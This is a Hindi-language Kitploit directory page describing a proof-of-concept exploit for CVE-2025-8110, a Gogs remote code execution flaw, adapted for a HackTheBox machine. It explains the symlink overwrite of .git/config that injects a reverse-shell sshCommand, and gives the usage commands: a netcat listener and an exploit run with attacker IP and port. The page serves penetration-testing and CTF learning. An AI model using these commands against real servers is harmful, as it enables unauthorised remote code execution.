Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-8110-Silentium-HTB — CVE-2025-8110 विशेष रूप से HTB पर Silentium बॉक्स के लिए। | Kitploit
उपकरण/GitHubGitHub/hassan-hamadi/cve-2025-8110-silentium-htb
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubhassan-hamadi/cve-2025-8110-silentium-htb

CVE-2025-8110-Silentium-HTB

CVE-2025-8110 विशेष रूप से HTB पर Silentium बॉक्स के लिए।

रिपॉजिटरी देखें
14 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-8110 — Gogs RCE PoC (Silentium / HackTheBox)

अस्वीकरण: यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत पैठ परीक्षण के लिए है। इसका उपयोग केवल उन प्रणालियों पर करें जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति है।


यह zAbuQasem/gogs-CVE-2025-8110 का एक संशोधित संस्करण है, जिसे HackTheBox पर Silentium मशीन के विरुद्ध काम करने के लिए अनुकूलित किया गया है। मूल PoC को Silentium की विशिष्ट Gogs कॉन्फ़िगरेशन और प्रमाणीकरण प्रवाह को संभालने के लिए समायोजन की आवश्यकता थी।


भेद्यता

CVE-2025-8110 Gogs में एक रिमोट कोड निष्पादन भेद्यता है, जो एक स्व-होस्टेड Git सेवा है।

Gogs का फ़ाइल-अपडेट API एंडपॉइंट (PUT /api/v1/repos/.../contents/<file>) यह सत्यापित नहीं करता कि लक्ष्य फ़ाइल एक सिमलिंक है या नहीं। एक प्रमाणित हमलावर एक रिपॉजिटरी में एक सिमलिंक (जो .git/config की ओर इशारा करता है) डाल सकता है, फिर API का उपयोग करके उसे एक दुर्भावनापूर्ण पेलोड से ओवरराइट कर सकता है। पेलोड git कॉन्फ़िग में एक कस्टम sshCommand इंजेक्ट करता है, जिसे Gogs अगली बार उस रिपॉजिटरी पर SSH ऑपरेशन करने पर सर्वर-साइड निष्पादित करता है, जिसके परिणामस्वरूप रिमोट कोड निष्पादन होता है।


PoC क्या करता है

  1. Gogs में प्रमाणित होता है और लॉगिन पेज से CSRF टोकन प्राप्त करता है।
  2. उपयोगकर्ता सेटिंग्स पेज के माध्यम से Gogs API टोकन उत्पन्न करता है।
  3. SSH सक्षम के साथ API के माध्यम से एक नया रिपॉजिटरी बनाता है।
  4. रिपॉजिटरी को स्थानीय रूप से क्लोन करता है, एक सिमलिंक (malicious_link -> .git/config) लगाता है, और इसे पुश करता है।
  5. सिमलिंक पर फ़ाइल-अपडेट API को कॉल करता है, एक दुर्भावनापूर्ण .git/config लिखता है जिसमें sshCommand = <reverse shell> होता है।
  6. Gogs सिमलिंक का अनुसरण करता है और अपने स्वयं के .git/config को ओवरराइट करता है, अगले SSH ऑपरेशन पर शेल को ट्रिगर करता है।

उपयोग

निर्भरताएँ स्थापित करें:

root@kitploit:~
pip install -r requirements.txt

एक लिसनर प्रारंभ करें:

root@kitploit:~
nc -lvnp <PORT>

एक्सप्लॉइट चलाएँ:

root@kitploit:~
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD>

वैकल्पिक — Burp Suite के माध्यम से रूट करें:

root@kitploit:~
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD> -x
FlagDescription
-uGogs बेस URL
-lhआपका हमलावर IP (रिवर्स शेल होस्ट)
-lpआपका लिसनर पोर्ट
-unआपका पंजीकृत Gogs उपयोगकर्ता नाम
-pwआपका Gogs पासवर्ड
-x(वैकल्पिक) localhost:8080 पर Burp के माध्यम से ट्रैफ़िक रूट करें
टूल डाउनलोड करें